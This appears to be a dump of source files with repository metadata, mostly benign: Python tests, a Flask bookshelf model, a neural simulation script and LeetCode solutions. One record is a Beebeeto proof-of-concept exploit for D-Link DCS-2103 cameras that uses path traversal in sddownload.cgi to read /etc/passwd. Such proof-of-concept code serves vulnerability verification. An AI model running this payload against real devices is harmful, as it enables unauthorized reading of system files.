    xyp_dict = xyz2xyp(R*cos(alpha), R*sin(alpha), 0)
    a_equal(list(xyp_dict.keys()), [1,2])
    aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)

    xyp_dict = xyz2xyp(-R*sin(alpha), R*cos(alpha), 0)
    a_equal(list(xyp_dict.keys()), [2,3])
    aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)

    xyp_dict = xyz2xyp(-R*cos(alpha), -R*sin(alpha), 0)
    a_equal(list(xyp_dict.keys()), [3,4])
    aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)

    xyp_dict = xyz2xyp(R*sin(alpha), -R*cos(alpha), 0)
    a_equal(list(xyp_dict.keys()), [1,4])
    aa_equal(list(xyp_dict.values()), [(-at,0), (at,0)], 15)

    xyp_dict = xyz2xyp(0, R*sin(alpha), -R*cos(alpha))
    a_equal(list(xyp_dict.keys()), [2,5])
    aa_equal(list(xyp_dict.values()), [(0,-at), (at,0)], 15)

    xyp_dict = xyz2xyp(0, R*sin(alpha), R*cos(alpha))
    a_equal(list(xyp_dict.keys()), [2,6])
    aa_equal(list(xyp_dict.values()), [(0,at), (at,0)], 15)


def test_xyp2xyz_xyz2xyp():
    '''
    xyp2xyz() -> xyz2xyp() : check consistency, repeat 1000 times
    '''
    from cart_cs import xyp2xyz, xyz2xyp

    N = 1000
    R = 1
    a = R/sqrt(3)

    for i in range(N):
        panel = randint(1,7)
        alpha, beta = (pi/2)*rand(2) - pi/4
        x, y = a*tan(alpha), a*tan(beta)
        (X, Y, Z) = xyp2xyz(x, y, panel)
        xyp_dict = xyz2xyp(X,Y,Z)
        aa_equal((x,y), xyp_dict[panel], 15)
```
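The `cart_cs` module under test is not included in this row. For orientation, a minimal sketch of the panel-1 gnomonic mapping that is consistent with the assertions above (a point on the inscribed cube face at distance `a = R/sqrt(3)` is projected radially onto the sphere); the other panels differ only by a rotation:

```python
from numpy import sqrt, tan, pi, cos, sin, allclose


def xyp2xyz_panel1(x, y, R=1.0):
    """Local face coordinates (x, y) on panel 1 -> Cartesian (X, Y, Z)."""
    a = R / sqrt(3)                  # half-width of the inscribed cube face
    r = sqrt(a**2 + x**2 + y**2)     # distance from sphere centre to face point (a, x, y)
    return (R * a / r, R * x / r, R * y / r)


# matches test_xyp2xyz: centre (0, 0) -> (1, 0, 0), and the border case
# x = a*tan(pi/4), y = 0 -> (R*cos(pi/4), R*sin(pi/4), 0)
a = 1 / sqrt(3)
assert allclose(xyp2xyz_panel1(0.0, 0.0), (1.0, 0.0, 0.0))
assert allclose(xyp2xyz_panel1(a * tan(pi / 4), 0.0), (cos(pi / 4), sin(pi / 4), 0.0))
```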
**Row 20 — `dpebot/getting-started-python` · `/4-auth/bookshelf/model_cloudsql.py` · branch refs/heads/master**

- ids: blob 7ba4723843b10f4bdde50acfefd5f04d1227d875 · directory 4344f7d6b3c26e8cb9c666ca0a1dc81d5d484fca · content 5ceac779fc83be92f4bf47d5d8bd2c1317916370 · snapshot 5beec5a68738ae47ed4bb642a7f4a119052ee6b6 · revision 07ce28b40c9be8555cb8575b83d7ba836b6483f2
- license: detected ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"] · license_type permissive · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 3,043 · is_vendor false · is_generated false
- dates: visit 2020-12-26T04:38:09.399296 · revision 2016-08-03T18:16:30 · committer 2016-08-03T18:16:30 · gha_event_created_at 2016-08-12T17:59:13 · gha_created_at 2016-08-12T17:59:13
- github: id 65,573,255 · stars 4 · forks 3
- authors: ["jon.wayne.parrott@gmail.com"] · author_id: jon.wayne.parrott@gmail.com

content:

```python
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy

builtin_list = list

db = SQLAlchemy()


def init_app(app):
    db.init_app(app)


def from_sql(row):
    """Translates a SQLAlchemy model instance into a dictionary"""
    data = row.__dict__.copy()
    data['id'] = row.id
    data.pop('_sa_instance_state')
    return data


class Book(db.Model):
    __tablename__ = 'books'

    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(255))
    author = db.Column(db.String(255))
    publishedDate = db.Column(db.String(255))
    imageUrl = db.Column(db.String(255))
    description = db.Column(db.String(255))
    createdBy = db.Column(db.String(255))
    createdById = db.Column(db.String(255))

    def __repr__(self):
        return "<Book(title='%s', author=%s)" % (self.title, self.author)


def list(limit=10, cursor=None):
    cursor = int(cursor) if cursor else 0
    query = (Book.query
             .order_by(Book.title)
             .limit(limit)
             .offset(cursor))
    books = builtin_list(map(from_sql, query.all()))
    next_page = cursor + limit if len(books) == limit else None
    return (books, next_page)


# [START list_by_user]
def list_by_user(user_id, limit=10, cursor=None):
    cursor = int(cursor) if cursor else 0
    query = (Book.query
             .filter_by(createdById=user_id)
             .order_by(Book.title)
             .limit(limit)
             .offset(cursor))
    books = builtin_list(map(from_sql, query.all()))
    next_page = cursor + limit if len(books) == limit else None
    return (books, next_page)
# [END list_by_user]


def read(id):
    result = Book.query.get(id)
    if not result:
        return None
    return from_sql(result)


def create(data):
    book = Book(**data)
    db.session.add(book)
    db.session.commit()
    return from_sql(book)


def update(data, id):
    book = Book.query.get(id)
    for k, v in data.items():
        setattr(book, k, v)
    db.session.commit()
    return from_sql(book)


def delete(id):
    Book.query.filter_by(id=id).delete()
    db.session.commit()


def _create_database():
    """
    If this script is run directly, create all the tables necessary to run the
    application.
    """
    app = Flask(__name__)
    app.config.from_pyfile('../config.py')
    init_app(app)
    with app.app_context():
        db.create_all()
    print("All tables created")


if __name__ == '__main__':
    _create_database()
```
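`list` and `list_by_user` implement offset-based cursor pagination: the returned cursor is the integer offset of the next page, or `None` when fewer than `limit` rows came back. A sketch of draining every page (the import path is hypothetical, and a Flask app context must be active, as in `_create_database`):

```python
from bookshelf import model_cloudsql as model  # hypothetical import path

books, cursor = model.list(limit=10)
while cursor is not None:                # cursor is the offset of the next page
    page, cursor = model.list(limit=10, cursor=cursor)
    books.extend(page)
print(len(books), "books total")
```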
4bf42f64d15e50c0c51bbc1ad46db6a070cd95e2
|
d5d2ddfb2f6a4d025d0d323d343550d11990674f
|
/model/scripts/main_mutual_information_MSN.py
|
d3113bb158c04dbcb81800724706ff0a482a1844
|
[] |
no_license
|
mickelindahl/dynsyn
|
5d710fa67d31f344c56c3b853b9d78af1f297fbf
|
c05a74c0f7dd977742ce55220d12270c03147e0f
|
refs/heads/master
| 2021-01-01T05:37:57.452690
| 2015-02-23T10:16:44
| 2015-02-23T10:16:44
| 30,537,438
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,161
|
py
|
import numpy
import pylab
import os
import sys
import time as ttime
# Get directory where model and code resides
model_dir= '/'.join(os.getcwd().split('/')[0:-1])
code_dir= '/'.join(os.getcwd().split('/')[0:-2])
# Add model, code and current directories to python path
sys.path.append(os.getcwd())
sys.path.append(model_dir)
sys.path.append(code_dir+'/nest_toolbox')
from simulation_utils import simulate_MSN
from src import misc
OUTPUT_PATH = os.getcwd()+'/output/' + sys.argv[0].split('/')[-1].split('.')[0]
RUN=True
# 48 minuter 200x10x10
HZS=numpy.linspace(5,50,10)
N_MSNS=numpy.linspace(5,50,10)
t=ttime.time()
save_result_at=OUTPUT_PATH+'/main_mutual_information_raw_data.pkl'
if RUN is False:
count_dic={}
for i_syn, syn in enumerate(['MSN_SNR_gaba_s_min', 'MSN_SNR_gaba_s_mid', 'MSN_SNR_gaba_s_max',
'MSN_SNR_gaba_p1']):
count_dic[i_syn]={}
for hz in numpy.linspace(5,50,10):
count_dic[i_syn][hz]={}
for N_MSN in numpy.linspace(5,50,10):
count_dic[i_syn][hz][N_MSN]=[]
for i in range(200):
c, time= simulate_MSN(int(N_MSN), ['SNR_izh'], [syn],
sim_time=1000, burst_onset=700, burst_offset=1000,
burst_rate=hz, threads=1)
count_dic[i_syn][hz][N_MSN].extend(c)
count_dic[i_syn][hz][N_MSN]=numpy.array(count_dic[i_syn][hz][N_MSN])
misc.pickle_save([count_dic, time],save_result_at)
else:
#count_dic, time= misc.pickle_load(save_result_at)
pass
save_result_at=OUTPUT_PATH+'/main_mutual_information_prob.pkl'
if RUN is False:
c_prob=[]
c_sum=[]
for i in sorted(list(count_dic.keys())):
c_prob.append([])
c_sum.append([])
for j, hz in enumerate(sorted(list(count_dic[i].keys()))):
c_prob[i].append([])
c_sum[i].append([])
for N in sorted(list(count_dic[i][hz].keys())):
c=count_dic[i][hz][N][2::3,:] # Pick out results for SNr
c_conv=misc.convolve(c,bin_extent=100, kernel_type='rectangle')
c_prob[i][j].append(numpy.sum(c_conv<1,axis=0)/float(c_conv.shape[0]))
c_sum[i][j].append(numpy.sum(c,axis=0))
c_prob=numpy.array(c_prob)
c_sum=numpy.array(c_sum)
misc.pickle_save([c_prob, c_sum, time],save_result_at)
else:
c_prob, c_sum, time= misc.pickle_load(save_result_at)
from numpy import *
import pylab as p
#import matplotlib.axes3d as p3
import mpl_toolkits.mplot3d.axes3d as p3
from matplotlib import cm
#ax2=pylab.subplot(111)
for i in range(c_sum.shape[0]):
#
x=[]
y=[]
z=[]
#fig = pylab.figure()
#ax1=pylab.subplot(111)
for j in range(c_sum.shape[1]):
x.append([])
y.append([])
z.append([])
for k in range(c_sum.shape[2]):
x[j].append(HZS[j])
y[j].append(N_MSNS[k])
z[j].append(c_sum[i,j,k,770])
#z[j].append(c_prob[i,j,k,770])
if (i==1) and (j==1) and (k==9):
fig = pylab.figure()
ax=pylab.subplot(111)
ax.plot(time, c_sum[i,j,k,:])
ax.plot(time, misc.convolve(c_sum[i,j,k,:], bin_extent=100, kernel_type='rectangle', single=True).transpose())
pylab.show()
ax.set_xlabel('Spike count')
#ax1.plot(c_sum[i,j,k,:])
#ax1.plot(c_prob[i,j,k,:])
x=numpy.array(x)
y=numpy.array(y)
z=numpy.array(z)
# fig = pylab.figure()
# ax = p3.Axes3D(fig)
# ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet)
# ax.view_init(50, 135)
#
fig = pylab.figure()
ax=pylab.subplot(111)
for k in range(c_sum.shape[1]):
ax.plot(x[:,k],z[:,k])
ax.set_xlabel('Firing rate (spikes/s)')
fig = pylab.figure()
ax=pylab.subplot(111)
for k in range(c_sum.shape[2]):
ax.plot(y[k,:],z[k,:])
ax.set_xlabel('Number of MSNs')
#ax1.pcolor(numpy.array(z))
#pylab.colorbar()
pylab.show()
count=numpy.array(count_dic[1][5][5])
save_result_at=OUTPUT_PATH+'/main_mutual_information_convolved_raw_data.pkl'
if RUN is True:
count_conv=[]
count_conv=misc.convolve(count, bin_extent=10, kernel_type='rectangle')
misc.pickle_save([count_conv],save_result_at)
else:
    count_conv= misc.pickle_load(save_result_at)[0]  # saved as [count_conv]
count=count_conv
save_result_at=OUTPUT_PATH+'/main_mutual_information_count_sr.pkl'
if RUN is True:
data=[]
min_data=[]
max_data=[]
for i in range(3):
data.append(numpy.array(count[i::3,:]))
        min_data.append(int(numpy.floor(numpy.min(count[i::3,:]))))
        max_data.append(int(numpy.ceil(numpy.max(count[i::3,:]))))
#data[1]=data[0]+data[1]
count_rs_list=[]
    print(max_data)
for k in range(len(time)):
        nx=range(min_data[1], max_data[1]+2)
        ny=range(min_data[2], max_data[2]+2)
        count_rs, xedges, yedges = numpy.histogram2d(data[1][:,k], data[2][:,k], bins=(nx, ny))
count_rs_list.append(count_rs)
misc.pickle_save([count_rs_list,data], save_result_at)
else:
count_rs_list, data=misc.pickle_load(save_result_at)
ff=misc.fano_factor(data[2])
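# (For reference: the Fano factor is variance/mean per time bin; assuming
#  misc.fano_factor reduces over the trial axis, a numpy equivalent would be
#  numpy.var(data[2], axis=0)/numpy.mean(data[2], axis=0).)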
a=numpy.ones((2,2))
b=numpy.ones((3,3))
c=numpy.array([[1,2,3],[2,1,3],[3,2,1]])
d=numpy.array([[2,1],[2,2]])
mi_test=misc.mutual_information([d,c, a,b])
mi=misc.mutual_information(count_rs_list)
max_data=[]
for i in range(3):
data.append(numpy.array(count[i::3]))
max_data.append(numpy.max(count[i::3]))
print(count_rs_list[0].shape, max_data, len(count_rs_list))
pylab.figure()
pylab.plot(time, ff)
pylab.figure()
for i in range(3):
pylab.subplot(3,1,i+1)
pylab.plot(time, numpy.sum(data[i], axis=0))
print('Simulation time', (ttime.time()-t) / 60., 'min')
pylab.show()
|
[
"mickelindahl@gmail.com"
] |
mickelindahl@gmail.com
|
28cd2ba0f453c1e05fbe64bea3586c73a9f79d23
|
f3bd271bf00325881fb5b2533b9ef7f7448a75ec
|
/xcp2k/classes/_ic1.py
|
dfa06f08d6b858b4ef14780d7a8e80c0a989bcb7
|
[] |
no_license
|
obaica/xcp2k
|
7f99fc9d494859e16b9b0ea8e217b0493f4b2f59
|
6e15c2c95658f545102595dc1783f5e03a9e6916
|
refs/heads/master
| 2020-07-15T17:27:43.378835
| 2019-02-11T16:32:24
| 2019-02-11T16:32:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
from xcp2k.inputsection import InputSection
class _ic1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Print_ic_list = None
self.Eps_dist = None
self.Optimize_homo_lumo = None
self.Gw_eigenvalues = None
self.Gw_eigenvalues_beta = None
self._name = "IC"
self._keywords = {'Optimize_homo_lumo': 'OPTIMIZE_HOMO_LUMO', 'Gw_eigenvalues': 'GW_EIGENVALUES', 'Eps_dist': 'EPS_DIST', 'Print_ic_list': 'PRINT_IC_LIST', 'Gw_eigenvalues_beta': 'GW_EIGENVALUES_BETA'}
self._aliases = {'Optimize': 'Optimize_homo_lumo'}
@property
def Optimize(self):
"""
See documentation for Optimize_homo_lumo
"""
return self.Optimize_homo_lumo
@Optimize.setter
def Optimize(self, value):
self.Optimize_homo_lumo = value
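# Minimal usage sketch (hypothetical values; kept as a comment since this is
# a generated library module):
#
#   ic = _ic1()
#   ic.Optimize = True           # the alias writes through...
#   ic.Optimize_homo_lumo        # ...to the underlying keyword -> True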
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
5f7c905b69a5173153cc985d9e73093dceb5a83f
|
5c531de5e4759c904e608b4fc653b2b041f79a0e
|
/Amazon_735. Asteroid Collision.py
|
6737b4cae3d0689e2f94c48aac92eb951b2c6267
|
[] |
no_license
|
jianhui-ben/leetcode_python
|
133c7e6e5c7316d00607ba2e327239e002de28b2
|
fcc16124cc24a5993e27f5d97e78d8f290e68230
|
refs/heads/master
| 2022-06-05T22:32:18.034581
| 2022-05-17T02:27:11
| 2022-05-17T02:27:11
| 250,683,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,407
|
py
|
#735. Asteroid Collision
#We are given an array asteroids of integers representing asteroids in a row.
#For each asteroid, the absolute value represents its size, and the sign represents
#its direction (positive meaning right, negative meaning left). Each asteroid moves
#at the same speed.
#Find out the state of the asteroids after all collisions. If two asteroids meet,
#the smaller one will explode. If both are the same size, both will explode. Two
#asteroids moving in the same direction will never meet.
#Example 1:
#Input: asteroids = [5,10,-5]
#Output: [5,10]
#Explanation: The 10 and -5 collide resulting in 10. The 5 and 10 never collide.
#Example 2:
#Input: asteroids = [8,-8]
#Output: []
#Explanation: The 8 and -8 collide exploding each other.
from typing import List
class Solution:
def asteroidCollision(self, asteroids: List[int]) -> List[int]:
##better method:
out=[]
for star in asteroids:
while out and out[-1]>0 and star<0:
if abs(out[-1])>abs(star):
break
elif abs(out[-1])<abs(star):
out.pop()
elif abs(out[-1])==abs(star):
out.pop()
break
else:
out.append(star)
return out
# ##Ben's method
# positive=False
# temp=[]
# add_negative=True
# for i in range(len(asteroids)):
# if asteroids[i] < 0 and not positive:
# temp.append(asteroids[i])
# elif asteroids[i]>=0:
# positive=True
# temp.append(asteroids[i])
# elif asteroids[i]<0 and positive:
# while len(temp)>0 and temp[-1]>0:
# last_positive=temp.pop()
# if last_positive+ asteroids[i]>0:
# temp.append(last_positive)
# break
# elif last_positive+ asteroids[i]==0:
# add_negative=False
# break
# if (len(temp)==0 or temp[-1]<=0) and add_negative: temp.append(asteroids[i])
# add_negative=True
# if not temp: positive=False
# else: positive= temp[-1]>=0
# add_negative=True
# return temp
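# Minimal usage sketch (hypothetical driver, mirroring the examples above):
#
#   s = Solution()
#   s.asteroidCollision([5, 10, -5])  # -> [5, 10]
#   s.asteroidCollision([8, -8])      # -> []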
|
[
"jianhui.ben@gmail.com"
] |
jianhui.ben@gmail.com
|
720fea823a41bf05eb6a14e1f940971f38e10095
|
e77a3618d0afe63a2f00d87b61c3f19d3eba10d8
|
/plugins/beebeeto/poc_2014_0149.py
|
ff203f0727674fb7a8ebff1da4a637af1da4eb49
|
[] |
no_license
|
Explorer1092/coco
|
b54e88a527b29209de7c636833ac5d102514291b
|
15c5aba0972ac68dc4c874ddacf5986af5ac2a64
|
refs/heads/master
| 2020-05-31T07:03:19.277209
| 2019-01-29T14:36:45
| 2019-01-29T14:36:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,184
|
py
|
#!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import urllib2
from baseframe import BaseFrame
class MyPoc(BaseFrame):
poc_info = {
        # PoC metadata
'poc': {
'id': 'poc-2014-0149',
'name': 'D-Link DCS-2103 /cgi-bin/sddownload.cgi 任意文件下载漏洞 Exploit',
'author': 'foundu',
'create_date': '2014-11-19',
},
        # protocol information
'protocol': {
'name': 'http',
'port': [80],
'layer4_protocol': ['tcp'],
},
        # vulnerability information
'vul': {
'app_name': 'D-Link',
'vul_version': 'DCS-2103',
'type': 'Arbitrary File Download',
'tag': ['D-Link漏洞', '任意文件下载漏洞', '/cgi-bin/sddownload.cgi', 'cgi'],
'desc': '''
Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model
with other firmware versions also must be vulnerable.
I found these vulnerabilities at 11.07.2014 and later informed D-Link. But
they haven't answered. It looks like they are busy with fixing
vulnerabilities in DAP-1360, which I wrote about earlier.
''',
'references': ['http://www.intelligentexploit.com/view-details.html?id=20197',
]
},
}
@classmethod
def exploit(cls, args):
payload = '/cgi-bin/sddownload.cgi?file=/../../etc/passwd'
verify_url = args['options']['target'] + payload
req = urllib2.Request(verify_url)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
content = urllib2.urlopen(req).read()
if 'root:' in content and 'nobody:' in content:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
args['poc_ret']['passwd'] = content
return args
verify = exploit
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run())
|
[
"834430486@qq.com"
] |
834430486@qq.com
|
21c0cebb2546807a8dd223104a08e5e29d58ec7c
|
62766deea531d0b89b86a53e6f51b94fd2a88f23
|
/AtCoder/ABC/131/c.py
|
fbe2beb18aab0fad58d1c7599493260ae7b68225
|
[
"MIT"
] |
permissive
|
ttyskg/ProgrammingCompetition
|
53620b07317ae5cbd1ee06272e573e3682ac15f3
|
885c5a1be228ae7ba9f00b3d63521c9ff7d21608
|
refs/heads/master
| 2023-08-18T08:38:33.068168
| 2023-08-15T04:28:13
| 2023-08-15T04:28:13
| 183,425,786
| 0
| 0
|
MIT
| 2023-08-15T04:28:14
| 2019-04-25T12:02:53
|
Python
|
UTF-8
|
Python
| false
| false
| 476
|
py
|
import sys
def gcd(a, b):
"""Euclidean Algorithm"""
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return (a * b) // gcd(a, b)
def main():
input = sys.stdin.readline
A, B, C, D = map(int, input().split())
E = lcm(C, D)
total = B - (A-1)
mul_c = B // C - (A-1) // C
mul_d = B // D - (A-1) // D
mul_e = B // E - (A-1) // E
return total - (mul_c + mul_d - mul_e)
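# Worked example of the inclusion-exclusion above (illustrative values):
# A=4, B=9, C=2, D=3 -> total = 9-3 = 6; multiples of C: 3, of D: 2,
# of lcm(C,D)=6: 1; answer = 6 - (3 + 2 - 1) = 2 (the numbers 5 and 7).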
if __name__ == '__main__':
print(main())
|
[
"tatsu100311@gmail.com"
] |
tatsu100311@gmail.com
|
889b22757513884a8c6c50f0b76bbe2c55a22845
|
b515ebbe9b259cf8cc11bae3eb2cd9094d9dac80
|
/tests/integration/test_base.py
|
09c270270007ae701dc6d64c0735eb0fe39714a5
|
[
"MIT",
"Python-2.0"
] |
permissive
|
cambiumproject/python-quickbooks
|
a234e29555e37399f53a9909cf4c3cf61e9e7bc1
|
06110a4a88bb47b2e6349a193908c083d506dde1
|
refs/heads/master
| 2023-08-07T20:15:14.600671
| 2021-07-20T21:53:59
| 2021-07-20T21:53:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,335
|
py
|
import os
from unittest import TestCase
from intuitlib.client import AuthClient
from quickbooks.client import QuickBooks, Environments
class QuickbooksTestCase(TestCase):
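    """Integration-test base.
    Assumes CLIENT_ID, CLIENT_SECRET, REFRESH_TOKEN and COMPANY_ID are
    exported in the environment (inferred from the os.environ lookups below).
    """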
def setUp(self):
super(QuickbooksTestCase, self).setUp()
self.auth_client = AuthClient(
client_id=os.environ.get('CLIENT_ID'),
client_secret=os.environ.get('CLIENT_SECRET'),
environment=Environments.SANDBOX,
redirect_uri='http://localhost:8000/callback',
)
self.qb_client = QuickBooks(
minorversion=59,
auth_client=self.auth_client,
refresh_token=os.environ.get('REFRESH_TOKEN'),
company_id=os.environ.get('COMPANY_ID'),
)
self.qb_client.sandbox = True
class QuickbooksUnitTestCase(TestCase):
def setUp(self):
super(QuickbooksUnitTestCase, self).setUp()
self.auth_client = AuthClient(
client_id='CLIENTID',
client_secret='CLIENT_SECRET',
environment=Environments.SANDBOX,
redirect_uri='http://localhost:8000/callback',
)
self.qb_client = QuickBooks(
#auth_client=self.auth_client,
refresh_token='REFRESH_TOKEN',
company_id='COMPANY_ID',
)
self.qb_client.sandbox = True
|
[
"edward.emanuel@gmail.com"
] |
edward.emanuel@gmail.com
|
843d5c4d45fddd036ed5fa1783b168dbde9b6640
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/binary_20200524140021.py
|
cad576ae530c25621bd03b09d3d763a13dba320b
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
def solution(N):
    # Binary gap: length of the longest run of zeros that is bounded by
    # ones on both sides in the binary representation of N.
    well = format(N, "b")
    print("binary", well)
    number = [int(c) for c in well]
    maximumCount = 0  # zeros in the current, still-open run
    totalCount = 0    # longest run already closed by a 1 on the right
    for digit in number:
        if digit == 0:
            maximumCount += 1
        else:
            totalCount = max(totalCount, maximumCount)
            maximumCount = 0
    print("total", totalCount)
    return totalCount
solution(9)
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
efd20d62075642d05d33586f9a2f19037598aa02
|
ee41311a11a1c6baedafd9a914d5a1f8330fe8a9
|
/SANEF_LIVE/venv/Lib/site-packages/skimage/segmentation/slic_superpixels.py
|
b196dbffc726dfb4cbf2e1da2a6e255d3901f1ec
|
[] |
no_license
|
sethnanati/CodeRepoPython
|
2dffb7263620bd905bf694f348485d894a9513db
|
b55e66611d19b35e9926d1b1387320cf48e177c8
|
refs/heads/master
| 2023-07-07T11:16:12.958401
| 2021-02-13T10:09:48
| 2021-02-13T10:09:48
| 376,531,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,799
|
py
|
# coding=utf-8
from __future__ import division
import collections as coll
import numpy as np
from scipy import ndimage as ndi
from ..util import img_as_float, regular_grid
from ..segmentation._slic import (_slic_cython,
_enforce_label_connectivity_cython)
from ..color import rgb2lab
def slic(image, n_segments=100, compactness=10., max_iter=10, sigma=0,
spacing=None, multichannel=True, convert2lab=None,
enforce_connectivity=True, min_size_factor=0.5, max_size_factor=3,
slic_zero=False):
"""Segments image using k-means clustering in Color-(x,y,z) space.
Parameters
----------
image : 2D, 3D or 4D ndarray
Input image, which can be 2D or 3D, and grayscale or multichannel
(see `multichannel` parameter).
n_segments : int, optional
The (approximate) number of labels in the segmented output image.
compactness : float, optional
Balances color proximity and space proximity. Higher values give
more weight to space proximity, making superpixel shapes more
square/cubic. In SLICO mode, this is the initial compactness.
This parameter depends strongly on image contrast and on the
shapes of objects in the image. We recommend exploring possible
values on a log scale, e.g., 0.01, 0.1, 1, 10, 100, before
refining around a chosen value.
max_iter : int, optional
Maximum number of iterations of k-means.
sigma : float or (3,) array-like of floats, optional
Width of Gaussian smoothing kernel for pre-processing for each
dimension of the image. The same sigma is applied to each dimension in
case of a scalar value. Zero means no smoothing.
Note, that `sigma` is automatically scaled if it is scalar and a
manual voxel spacing is provided (see Notes section).
spacing : (3,) array-like of floats, optional
The voxel spacing along each image dimension. By default, `slic`
assumes uniform spacing (same voxel resolution along z, y and x).
This parameter controls the weights of the distances along z, y,
and x during k-means clustering.
multichannel : bool, optional
Whether the last axis of the image is to be interpreted as multiple
channels or another spatial dimension.
convert2lab : bool, optional
Whether the input should be converted to Lab colorspace prior to
segmentation. The input image *must* be RGB. Highly recommended.
This option defaults to ``True`` when ``multichannel=True`` *and*
``image.shape[-1] == 3``.
enforce_connectivity: bool, optional
Whether the generated segments are connected or not
min_size_factor: float, optional
Proportion of the minimum segment size to be removed with respect
to the supposed segment size ```depth*width*height/n_segments```
max_size_factor: float, optional
Proportion of the maximum connected segment size. A value of 3 works
in most of the cases.
slic_zero: bool, optional
Run SLIC-zero, the zero-parameter mode of SLIC. [2]_
Returns
-------
labels : 2D or 3D array
Integer mask indicating segment labels.
Raises
------
ValueError
If ``convert2lab`` is set to ``True`` but the last array
dimension is not of length 3.
Notes
-----
* If `sigma > 0`, the image is smoothed using a Gaussian kernel prior to
segmentation.
* If `sigma` is scalar and `spacing` is provided, the kernel width is
divided along each dimension by the spacing. For example, if ``sigma=1``
and ``spacing=[5, 1, 1]``, the effective `sigma` is ``[0.2, 1, 1]``. This
ensures sensible smoothing for anisotropic images.
* The image is rescaled to be in [0, 1] prior to processing.
* Images of shape (M, N, 3) are interpreted as 2D RGB images by default. To
interpret them as 3D with the last dimension having length 3, use
`multichannel=False`.
References
----------
.. [1] Radhakrishna Achanta, Appu Shaji, Kevin Smith, Aurelien Lucchi,
Pascal Fua, and Sabine Süsstrunk, SLIC Superpixels Compared to
State-of-the-art Superpixel Methods, TPAMI, May 2012.
.. [2] http://ivrg.epfl.ch/research/superpixels#SLICO
Examples
--------
>>> from skimage.segmentation import slic
>>> from skimage.data import astronaut
>>> img = astronaut()
>>> segments = slic(img, n_segments=100, compactness=10)
Increasing the compactness parameter yields more square regions:
>>> segments = slic(img, n_segments=100, compactness=20)
"""
image = img_as_float(image)
is_2d = False
if image.ndim == 2:
# 2D grayscale image
image = image[np.newaxis, ..., np.newaxis]
is_2d = True
elif image.ndim == 3 and multichannel:
# Make 2D multichannel image 3D with depth = 1
image = image[np.newaxis, ...]
is_2d = True
elif image.ndim == 3 and not multichannel:
# Add channel as single last dimension
image = image[..., np.newaxis]
if spacing is None:
spacing = np.ones(3)
elif isinstance(spacing, (list, tuple)):
spacing = np.array(spacing, dtype=np.double)
if not isinstance(sigma, coll.Iterable):
sigma = np.array([sigma, sigma, sigma], dtype=np.double)
sigma /= spacing.astype(np.double)
elif isinstance(sigma, (list, tuple)):
sigma = np.array(sigma, dtype=np.double)
if (sigma > 0).any():
# add zero smoothing for multichannel dimension
sigma = list(sigma) + [0]
image = ndi.gaussian_filter(image, sigma)
if multichannel and (convert2lab or convert2lab is None):
if image.shape[-1] != 3 and convert2lab:
raise ValueError("Lab colorspace conversion requires a RGB image.")
elif image.shape[-1] == 3:
image = rgb2lab(image)
depth, height, width = image.shape[:3]
# initialize cluster centroids for desired number of segments
grid_z, grid_y, grid_x = np.mgrid[:depth, :height, :width]
slices = regular_grid(image.shape[:3], n_segments)
step_z, step_y, step_x = [int(s.step if s.step is not None else 1)
for s in slices]
segments_z = grid_z[slices]
segments_y = grid_y[slices]
segments_x = grid_x[slices]
segments_color = np.zeros(segments_z.shape + (image.shape[3],))
segments = np.concatenate([segments_z[..., np.newaxis],
segments_y[..., np.newaxis],
segments_x[..., np.newaxis],
segments_color],
axis=-1).reshape(-1, 3 + image.shape[3])
segments = np.ascontiguousarray(segments)
# we do the scaling of ratio in the same way as in the SLIC paper
# so the values have the same meaning
step = float(max((step_z, step_y, step_x)))
ratio = 1.0 / compactness
image = np.ascontiguousarray(image * ratio)
labels = _slic_cython(image, segments, step, max_iter, spacing, slic_zero)
if enforce_connectivity:
segment_size = depth * height * width / n_segments
min_size = int(min_size_factor * segment_size)
max_size = int(max_size_factor * segment_size)
labels = _enforce_label_connectivity_cython(labels,
min_size,
max_size)
if is_2d:
labels = labels[0]
return labels
|
[
"adeyemiadenuga@gmail.com"
] |
adeyemiadenuga@gmail.com
|
0a20a0a7c7b6b3c688405d2ef7bcee0b30ed230f
|
ee3e0a69093e82deff1bddf607f6ce0dde372c48
|
/coding_test/카카오 인턴/num_4.py
|
226a287c788a6bf68f50fcecbe70e1a4d17bfa7e
|
